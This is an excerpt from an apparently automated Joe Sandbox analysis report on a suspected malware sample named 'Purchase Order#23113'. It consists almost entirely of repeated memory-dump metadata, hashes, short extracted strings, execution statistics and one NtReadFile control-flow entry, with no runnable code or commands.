                                                                            • Instruction ID: 6303f4aca7ec4d911e342b56e3a4d6baaf25cc8c3e89a6ba9ba4ac39331623ca
                                                                            • Opcode Fuzzy Hash: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                                                            • Instruction Fuzzy Hash: 9A21A1765093808FDB13CF24D994715BF71EB85218F28C5EAD8498F6A7C33AD40ACB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769770147.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_12bd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769770147.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_12bd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$:$pbq$~
                                                                            • API String ID: 0-999388165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fs$JAa
                                                                            • API String ID: 0-3210266105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fs$JAa
                                                                            • API String ID: 0-3210266105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q;H$^a
                                                                            • API String ID: 0-3451896257
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q;H$^a
                                                                            • API String ID: 0-3451896257
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Sa1s$a f.
                                                                            • API String ID: 0-1389528605
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Sa1s$a f.
                                                                            • API String ID: 0-1389528605
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$QaM
                                                                            • API String ID: 0-159444895
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$QaM
                                                                            • API String ID: 0-159444895
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a8a6bc0c3d1ced4b3df0b8eea3b0ccd6dcc8507076899861ba28439a15f7981
                                                                            • Instruction ID: 9ed37dd6b090974780892b4b0e43dc231d5a43e496dd3b1ca5624949e3467202
                                                                            • Opcode Fuzzy Hash: 7a8a6bc0c3d1ced4b3df0b8eea3b0ccd6dcc8507076899861ba28439a15f7981
                                                                            • Instruction Fuzzy Hash: ED111771E116199BEB08CFAAD840AEEFBF7EBC9310F14C06AD408A7214DB305A018B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 24b528791ccf6adaa5b4c61fe5b792ff9eb6e30ccec9773a70d643c0fb4193eb
                                                                            • Instruction ID: a3cdc9d7477d32d93f67dae35e254d5801f5c2542aa52972d9f106f0af8fcf40
                                                                            • Opcode Fuzzy Hash: 24b528791ccf6adaa5b4c61fe5b792ff9eb6e30ccec9773a70d643c0fb4193eb
                                                                            • Instruction Fuzzy Hash: 31114C71E116198BEB48CFAAD8406AEFAF3AFC8300F14C17AD418A73A4DB705A018B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e25ae37009600ed8536cef40ee2b2416de5afd021d22d396ac8cc2318352adc0
                                                                            • Instruction ID: c7215bf1a00d891b2483aea51503b46e5de180c7dd63b15839d75ee146836f35
                                                                            • Opcode Fuzzy Hash: e25ae37009600ed8536cef40ee2b2416de5afd021d22d396ac8cc2318352adc0
                                                                            • Instruction Fuzzy Hash: 7F113A70E116198BEB48CF6BD9416EEFBF7AFC8300F14C47A9849A7254DB705A428F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 315fca37f0f07c095d1a79b811ab60e0e394a58dfa5fc95a5a45fcecd643bcf7
                                                                            • Instruction ID: 1136fac1da784845b77a97a48669189ee4724652b6caaf69fef7a3f7c09e5725
                                                                            • Opcode Fuzzy Hash: 315fca37f0f07c095d1a79b811ab60e0e394a58dfa5fc95a5a45fcecd643bcf7
                                                                            • Instruction Fuzzy Hash: F9E04FB6959208CBCA208F99A4451F4BB7CE78F281F442052DA0ED3201D63095418F98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b02fea86009d6e7b397700fc6c16d6ac0f36c83c7a8579bb8df401953728b7c2
                                                                            • Instruction ID: 7d4280d279cc29855eeab8e51e9d465ca7872f483c1d19d45b6dfe5eca169668
                                                                            • Opcode Fuzzy Hash: b02fea86009d6e7b397700fc6c16d6ac0f36c83c7a8579bb8df401953728b7c2
                                                                            • Instruction Fuzzy Hash: E1D05E5798F280DAC72206A56C540F0AB3DCADB061F9C21E3CA69D6693C014C1298399
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:2.9%
                                                                            Signature Coverage:5.9%
                                                                            Total number of Nodes:561
                                                                            Total number of Limit Nodes:72

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                                                            APIs
                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: 1JA$rMA$rMA
                                                                            • API String ID: 2738559852-782607585
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
